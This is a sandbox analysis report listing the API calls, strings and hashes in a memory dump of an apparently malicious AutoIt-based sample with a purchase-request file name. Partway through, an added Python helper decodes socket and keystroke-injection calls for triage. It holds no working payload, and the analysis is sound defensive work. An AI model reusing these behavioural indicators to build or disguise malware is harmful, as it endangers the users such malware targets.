                    • Instruction ID: bf73c60a0c91cda6b9079d084fd0de7097f0a9b8e6a7a752f65c1e629a3befc3
                    • Opcode Fuzzy Hash: 3d4a08cb73d1c808b6f4848c97be80e3a59cf41874d8a67346bcc55c855f3bf5
                    • Instruction Fuzzy Hash: 72A13D71104205AFD304EF54C891EABB7F8FF95304F00992DF19AA71A2DB70EA49CB52
                    APIs
                      • Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
                      • Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00E77BB1: _memmove.LIBCMT ref: 00E77C0B
                    • __swprintf.LIBCMT ref: 00E8302D
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E82EC6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 1943609520-557222456
                    • Opcode ID: d52225def26dc346686a951ebf0768ba77db8bbbaf0f3567a6c4c74db014be08
                    • Instruction ID: 6c7219910231e755ca9a8b722177cb4f71425ec7ec106101b549e4807d7177c0
                    • Opcode Fuzzy Hash: d52225def26dc346686a951ebf0768ba77db8bbbaf0f3567a6c4c74db014be08
                    • Instruction Fuzzy Hash: 54916D722083019FCB18FF24D885CAFB7E4EF85754F00691DF499A72A1DA60EE44CB52
                    APIs
                      • Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE
                    • CoInitialize.OLE32(00000000), ref: 00EDBC26
                    • CoCreateInstance.OLE32(00F02D6C,00000000,00000001,00F02BDC,?), ref: 00EDBC3F
                    • CoUninitialize.OLE32 ref: 00EDBC5C
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                    • String ID: .lnk
                    • API String ID: 2126378814-24824748
                    • Opcode ID: 1d875b4bcf47806565ebe99f455fa22045257801d10543539a45f1183b556f44
                    • Instruction ID: aafa68d7d861702f24c0f2d11d8b582045ae5743438a70407ce2b2962df2dd6e
                    • Opcode Fuzzy Hash: 1d875b4bcf47806565ebe99f455fa22045257801d10543539a45f1183b556f44
                    • Instruction Fuzzy Hash: 6FA166756043019FCB04DF14C484D6ABBE5FF88324F158999F899AB3A2DB31ED46CB92
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 00E952DD
                      • Part of subcall function 00EA0340: __87except.LIBCMT ref: 00EA037B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    Strings
                    Similarity
                    • API ID:
                    • String ID: #$+
                    • API String ID: 0-2552117581
                    APIs
                    Strings
                    Similarity
                    • API ID: _memmove$_free
                    • String ID: Oa
                    • API String ID: 2620147621-3945284152
                    APIs
                    Strings
                    Similarity
                    • API ID: _memset$_memmove
                    • String ID: ERCP
                    • API String ID: 2532777613-1384759551
                    APIs
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00EFF910,00000000,?,?,?,?), ref: 00EF7C4E
                    • GetWindowLongW.USER32 ref: 00EF7C6B
                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EF7C7B
                    Strings
                    Similarity
                    • API ID: Window$Long
                    • String ID: SysTreeView32
                    • API String ID: 847901565-1698111956
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EF76D0
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EF76E4
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EF7708
                    Strings
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EF6FAA
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EF6FBA
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EF6FDF
                    Strings
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: Listbox
                    • API String ID: 3315199576-2633736733
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EF79E1
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EF79F6
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EF7A03
                    Strings
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E74C2E), ref: 00E74CA3
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E74CB5
                    Strings
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E74CE1,?), ref: 00E74DA2
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E74DB4
                    Strings
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E74D2E,?,00E74F4F,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74D6F
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E74D81
                    Strings
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00EF12C1), ref: 00EF1080
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EF1092
                    Strings
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00EE9009,?,00EFF910), ref: 00EE9403
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EE9415
                    Strings
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 00EEE3D2
                    • CharLowerBuffW.USER32(?,?), ref: 00EEE415
                      • Part of subcall function 00EEDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EEDAD9
                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00EEE615
                    • _memmove.LIBCMT ref: 00EEE628
                    Similarity
                    • API ID: BuffCharLower$AllocVirtual_memmove
                    • String ID:
                    • API String ID: 3659485706-0
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 00EE83D8
                    • CoUninitialize.OLE32 ref: 00EE83E3
                      • Part of subcall function 00ECDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00ECDAC5
                    • VariantInit.OLEAUT32(?), ref: 00EE83EE
                    • VariantClear.OLEAUT32(?), ref: 00EE86BF
                    Similarity
                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                    • String ID:
                    • API String ID: 780911581-0
                    APIs
                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F02C7C,?), ref: 00EC7C32
                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F02C7C,?), ref: 00EC7C4A
                    • CLSIDFromProgID.OLE32(?,?,00000000,00EFFB80,000000FF,?,00000000,00000800,00000000,?,00F02C7C,?), ref: 00EC7C6F
                    • _memcmp.LIBCMT ref: 00EC7C90
                    Similarity
                    • API ID: FromProg$FreeTask_memcmp
                    • String ID:
                    • API String ID: 314563124-0
                    APIs
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    APIs
                    • GetWindowRect.USER32(014C0CD0,?), ref: 00EF9AD2
                    • ScreenToClient.USER32(00000002,00000002), ref: 00EF9B05
                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00EF9B72
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    • Opcode ID: 763f592abac16e110050cbfefbe515f7246308cf03a88560bfe0bbb33e605247
                    • Instruction ID: 7a32a8e60ee112965ba3f5e739aebb694a94bf82966b94f16124f8b9e06f0804
                    • Opcode Fuzzy Hash: 763f592abac16e110050cbfefbe515f7246308cf03a88560bfe0bbb33e605247
                    • Instruction Fuzzy Hash: 59512C34A0060DAFCF24DF68D880ABE7BB6FF44324F149259FA55AB291D730AD41DB94
                    APIs
                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00EE6CE4
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE6CF4
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EE6D58
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE6D64
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorLast$__itow__swprintfsocket
                    • String ID:
                    • API String ID: 2214342067-0
                    • Opcode ID: e05c87063e8cbdf04a892380268493f999dfa548ac4b8352a2266b3e1d5cccbe
                    • Instruction ID: 1bb7243fa7e3f233d9fd2791b57df5448071c6aa6f8ac91652820f157da7517e
                    • Opcode Fuzzy Hash: e05c87063e8cbdf04a892380268493f999dfa548ac4b8352a2266b3e1d5cccbe
                    • Instruction Fuzzy Hash: B0416B75740200AFEB20AF24DC86F3A76E5EF58B24F44D418FA59BB2D3DA719D008B91
                    APIs
                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00EFF910), ref: 00EE67BA
                    • _strlen.LIBCMT ref: 00EE67EC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID:
                    • API String ID: 4218353326-0
                    • Opcode ID: bfa6ae4bf68615363ca09e019f5a1e48d00e5880ef7dc9b2f77d8c5e34475420
                    • Instruction ID: a857e20bccfd2d53c3d0d3cefbf2034a9f6ebf2dc246940b3ad35960da8d1647
                    • Opcode Fuzzy Hash: bfa6ae4bf68615363ca09e019f5a1e48d00e5880ef7dc9b2f77d8c5e34475420
                    • Instruction Fuzzy Hash: EE41C631A00108AFCB14EBA5DCC1FAEB3E9EF54354F149169F919B7292DB70AD40CB94
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EDBB09
                    • GetLastError.KERNEL32(?,00000000), ref: 00EDBB2F
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EDBB54
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EDBB80
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    • Opcode ID: 3352155ef35fc98e5b9b70710137c508e6075ab4ea215de7a8cd4e44b11d5073
                    • Instruction ID: 86aa49b062124f245d8e2fe3a64ac685eaa050a770e7ac5d1be1f09fc7418964
                    • Opcode Fuzzy Hash: 3352155ef35fc98e5b9b70710137c508e6075ab4ea215de7a8cd4e44b11d5073
                    • Instruction Fuzzy Hash: 1C412539200610DFDF11EF15C584A5DBBE1EF89324B09D499E94AAB362CB34FD01CB91
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EF8B4D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: a6cfc9daaab3b2468eba46eb226be013742e474108dba3a16915c78b78faf0ff
                    • Instruction ID: d71fa721d142b883d813735ee044ef95e41be0dd037228fb5f6aca0d4844051b
                    • Opcode Fuzzy Hash: a6cfc9daaab3b2468eba46eb226be013742e474108dba3a16915c78b78faf0ff
                    • Instruction Fuzzy Hash: 0331C37860020CBEEF209F18CE59FB937A5EB05324F64A652FB55F62A1DE30AD40D751
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 00EFAE1A
                    • GetWindowRect.USER32(?,?), ref: 00EFAE90
                    • PtInRect.USER32(?,?,00EFC304), ref: 00EFAEA0
                    • MessageBeep.USER32(00000000), ref: 00EFAF11
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    • Opcode ID: decebcf7f8b65ff2e42530c415aee6a740b6236be86648fc2fa1c063a03cb7c5
                    • Instruction ID: bc1e532b06cdaa1c62ccd21030a7ba83f0f18c0f26c50abd12b76fed8e9057d2
                    • Opcode Fuzzy Hash: decebcf7f8b65ff2e42530c415aee6a740b6236be86648fc2fa1c063a03cb7c5
                    • Instruction Fuzzy Hash: 1B417AB560010DEFCB11CF58C884AA97BF5FF88354F1890B9E618EF251D730A882DB92
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00ED1037
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00ED1053
                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00ED10B9
                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00ED110B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 49acf5e04e4b3e67ac917e9c2eae214b1dc35bd77c2ce9c88af83e5fa76c981d
                    • Instruction ID: afc6c3b0af375125d776a87d17454126139125d5f6476929626c3646da73184c
                    • Opcode Fuzzy Hash: 49acf5e04e4b3e67ac917e9c2eae214b1dc35bd77c2ce9c88af83e5fa76c981d
                    • Instruction Fuzzy Hash: 97313B70E40688BEFB30AA658C05BF9BBA9EF45314F08629BE590723D1C3754DC69751
                    APIs
                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00ED1176
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00ED1192
                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00ED11F1
                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00ED1243
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 317fe3cc99bf7b65ceae20adbba2c9621e1a51328d5a502e8faa2badf0493334
                    • Instruction ID: 5b7d5aca06f36eaba33d704ab92d21eeff32b327f76c3a1736c6b2cffede84f8
                    • Opcode Fuzzy Hash: 317fe3cc99bf7b65ceae20adbba2c9621e1a51328d5a502e8faa2badf0493334
                    • Instruction Fuzzy Hash: 85312B30941658BEEF308A658C047FEBBAAEB85314F04639BE590B23E1C3354956D751
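The "APIs" entries above only show raw hexadecimal arguments and, for WSOCK32, ordinal-only imports ("#21", "#16"), so the UDP socket function (socket / #21 / #16 / WSAGetLastError) and the two keystroke functions (GetKeyboardState / SetKeyboardState / PostMessageW / SendInput) take some decoding by hand. The following Python is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses lines in exactly this "• api.MODULE(args), ref: addr" shape, resolves the WSOCK32 ordinals from a partial export table (16 = recv, 21 = setsockopt), names the constants (socket(2,2,0x11) is AF_INET/SOCK_DGRAM/IPPROTO_UDP; setsockopt level 0xFFFF option 0x20 is SOL_SOCKET/SO_BROADCAST; PostMessageW message 0x102 is WM_CHAR; SendInput cbSize 0x1C is the 32-bit INPUT structure) and flags the two behaviours they imply. The sample lines are constructed copies of entries from this section; the ordinal and constant tables are the assumptions the decoding rests on, and the remark that AutoIt's UDPOpen() with its broadcast flag produces the socket pattern is the editor's inference, not something the report states.

```python
"""Parse Joe Sandbox 'APIs' entries into call records and decode the raw arguments."""
import re
from collections import defaultdict

# Constructed sample: copies of "APIs" lines in the shape used by the report above
# (the UDP socket function and the keystroke-injection function). "?" is an unknown value.
SAMPLE = """\
• socket.WSOCK32(00000002,00000002,00000011), ref: 00EE6CE4
• WSAGetLastError.WSOCK32(00000000), ref: 00EE6CF4
  • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EE6D58
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00EFF910), ref: 00EE67BA
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00ED10B9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00ED110B
"""

# Partial export-ordinal table for WSOCK32.dll (identical to WS2_32.dll for these entries);
# the dump shows ordinal-only imports as "#<n>".
WSOCK32_ORDINALS = {16: "recv", 17: "recvfrom", 19: "send", 20: "sendto", 21: "setsockopt", 23: "socket"}

# Windows constants used to name raw argument values.
AF = {2: "AF_INET"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTO = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
SOL = {0xFFFF: "SOL_SOCKET"}
SO_OPT = {0x4: "SO_REUSEADDR", 0x20: "SO_BROADCAST"}
WM = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP", 0x102: "WM_CHAR"}
SIZEOF_INPUT_X86 = 28  # sizeof(INPUT) in a 32-bit process, the cbSize SendInput expects

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[#\w:]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
ARG_RE = re.compile(r"([0-9A-Fa-f]{8})(?:\(.*\))?")  # "00000003(TokenPrivileges)" -> 3


def parse_arg(tok):
    """'?' -> None, 8-digit hex (optionally annotated) -> int, anything else stays a string."""
    tok = tok.strip()
    if tok == "?":
        return None
    m = ARG_RE.fullmatch(tok)
    return int(m.group(1), 16) if m else tok


def parse_api_lines(text):
    """Turn each '• api.MODULE(args), ref: addr' line into a dict; resolve WSOCK32 ordinals."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        api, module = m["api"], m["module"]
        if api.startswith("#") and module == "WSOCK32":
            api = WSOCK32_ORDINALS.get(int(api[1:]), api)
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": api, "module": module, "args": args, "ref": m["ref"], "caller": m["caller"]})
    return calls


def fmt(v):
    if v is None:
        return "?"
    return f"0x{v:X}" if isinstance(v, int) else v


def annotate(call):
    """Render a call with its well-known constants named."""
    api, a = call["api"], call["args"]

    def name(table, v):
        return table.get(v, fmt(v))

    if api == "socket" and len(a) >= 3:
        return f"socket({name(AF, a[0])}, {name(SOCK_TYPE, a[1])}, {name(PROTO, a[2])})"
    if api == "setsockopt" and len(a) >= 3:
        return f"setsockopt(s, {name(SOL, a[1])}, {name(SO_OPT, a[2])}, ...)"
    if api == "PostMessageW" and len(a) >= 2:
        return f"PostMessageW(hwnd, {name(WM, a[1])}, ...)"
    if api == "SendInput" and len(a) >= 3:
        size = "32-bit INPUT" if a[2] == SIZEOF_INPUT_X86 else "unexpected INPUT size"
        return f"SendInput(n={a[0]}, cbSize={a[2]}, {size})"
    return f"{api}({', '.join(fmt(v) for v in a)})"


def findings(calls):
    """Behavioural patterns an analyst would pull out of these calls."""
    by_api = defaultdict(list)
    for c in calls:
        by_api[c["api"]].append(c)
    found = []
    udp = any(c["args"][:3] == [2, 2, 17] for c in by_api["socket"])
    bcast = any(c["args"][1:3] == [0xFFFF, 0x20] for c in by_api["setsockopt"])
    if udp and bcast:
        # Assumption: this is what AutoIt's UDPOpen() sets up when its broadcast flag is given.
        found.append("broadcast-capable UDP socket")
    keys = any(len(c["args"]) > 1 and c["args"][1] in WM for c in by_api["PostMessageW"])
    if keys and by_api["SendInput"]:
        found.append("synthetic keystroke injection")
    return found


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    for c in calls:
        print(f"{c['ref']}  {annotate(c)}")
    print("findings:", findings(calls))
```

Feed it the whole "APIs" section of a report rather than the constructed sample and the output is one decoded line per call plus the pattern summary; extend the constant tables (TOKEN_INFORMATION_CLASS values for the GetTokenInformation entries, window messages for the DefDlgProcW entries) as the functions of interest require.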
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EA644B
                    • __isleadbyte_l.LIBCMT ref: 00EA6479
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EA64A7
